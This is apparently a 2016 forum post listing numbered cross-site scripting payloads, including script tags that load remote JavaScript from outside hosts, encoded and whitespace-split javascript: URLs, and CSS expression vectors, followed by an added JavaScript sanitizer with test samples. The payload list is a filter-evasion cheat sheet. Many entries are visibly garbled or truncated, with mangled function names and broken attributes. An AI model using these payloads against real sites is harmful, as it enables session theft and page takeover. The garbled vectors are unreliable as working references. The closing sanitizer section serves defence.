XSS Attack Roundup

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes
<q/oncut=alert()>1
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
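Most of the vectors in the post that target a URL-valued attribute (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC) rely on the same handful of tricks to smuggle a `javascript:` scheme past a filter: mixed case (4), numeric character references with or without the semicolon (5, 8-10), embedded tabs, newlines and carriage returns (11-14), NUL bytes (17) and leading whitespace (19). The defender's counter is to normalize the value the way the HTML parser will before looking at the scheme, and then to allowlist schemes rather than denylist `javascript`. The following is an added example written for this page, not code from the post; the function names, the per-tag attribute allowlist and the sample inputs are constructed here:

```javascript
// Added example (not from the forum post): an allowlist check for URL-valued
// attributes that normalizes the value as an HTML parser would before reading
// the scheme, plus a per-tag attribute allowlist that drops event handlers and
// STYLE outright. Names, allowlists and samples are constructed for this example.

// Named references an attribute value is likely to carry; anything else is left intact.
const NAMED_REFS = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n' };

// Step 1: decode character references once, as the parser does for attribute values.
// Numeric references are decoded even when the trailing semicolon is missing.
function decodeCharRefs(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp <= 0x10FFFF ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_REFS[body.toLowerCase()];
    return named !== undefined ? named : match;
  });
}

// Step 2: characters to drop before reading the scheme. Browsers strip tab, LF and
// CR from URLs and leading/trailing C0 controls and spaces; dropping the whole C0
// range, DEL and the Unicode spaces the post mentions in (47) is deliberately
// stricter than the browser, which can only make this check reject more, never less.
const IGNORED = /[\u0000-\u0020\u007F\u00A0\u2000-\u200F\u3000\uFEFF]/g;

function normalizeUrl(value) {
  return decodeCharRefs(String(value)).replace(IGNORED, '').toLowerCase();
}

// Step 3: allowlist the scheme. Relative references ("/path", "#top", "//host/x")
// have no scheme and are accepted; anything else must be http, https or mailto, so
// a scriptable scheme that is not on the list is rejected by default.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrlAttribute(value) {
  const url = normalizeUrl(value);
  const scheme = /^([a-z][a-z0-9+.-]*):/.exec(url);
  return scheme === null || ALLOWED_SCHEMES.has(scheme[1]);
}

// Per-tag attribute allowlist. Matching happens after lowercasing, so onLoad, STYLE
// and friends are dropped together with every event-handler, style and expression()
// vector in the post; URL attributes are additionally scheme-checked.
const ALLOWED_ATTRS = {
  a:   new Set(['href', 'title']),
  img: new Set(['src', 'alt', 'width', 'height']),
};
const URL_ATTRS = new Set(['href', 'src']);

// Returns the surviving attributes, or null when the tag itself is not allowed.
function sanitizeAttributes(tag, attrs) {
  const allowed = ALLOWED_ATTRS[tag.toLowerCase()];
  if (!allowed) return null;
  const out = {};
  for (const [rawName, value] of Object.entries(attrs)) {
    const name = rawName.toLowerCase();
    if (!allowed.has(name)) continue;
    if (URL_ATTRS.has(name) && !isSafeUrlAttribute(value)) continue;
    out[name] = value;
  }
  return out;
}

// Constructed samples modelled on the post's vectors: [value, expected verdict].
const SAMPLES = [
  ["javascript:alert('XSS')", false],                                                      // (3)
  ["JaVaScRiPt:alert('XSS')", false],                                                      // (4)
  ["&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", false],  // (5)
  ["&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')", false],             // (9)
  ["&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')", false],        // (10)
  ["jav\tascript:alert('XSS')", false],                                                    // (11)
  ["jav&#x0A;ascript:alert('XSS')", false],                                                // (12)/(13)
  ["java\0script:alert('XSS')", false],                                                    // (17)
  ["   javascript:alert('XSS')", false],                                                   // (19)
  ["http://example.com/page?a=1&amp;b=2", true],
  ["/relative/path?x=a:b", true],
  ["#top", true],
  ["mailto:someone@example.com", true],
];

// True when every sample gets the expected verdict.
function checkSamples() {
  return SAMPLES.every(([value, expected]) => isSafeUrlAttribute(value) === expected);
}

for (const [value, expected] of SAMPLES) {
  console.log(isSafeUrlAttribute(value) === expected ? 'ok  ' : 'FAIL', JSON.stringify(value));
}
```

Two design points are worth noting. The check decodes character references exactly once, matching what the parser does for an attribute value, so a double-encoded `&amp;#106;` stays inert just as it does in the browser. Protocol-relative references such as `//3w.org/XSS/xss.js` (25) pass the scheme check because they carry no scheme; if a `src` must stay on your own origin, add a host check on top rather than loosening the scheme rule.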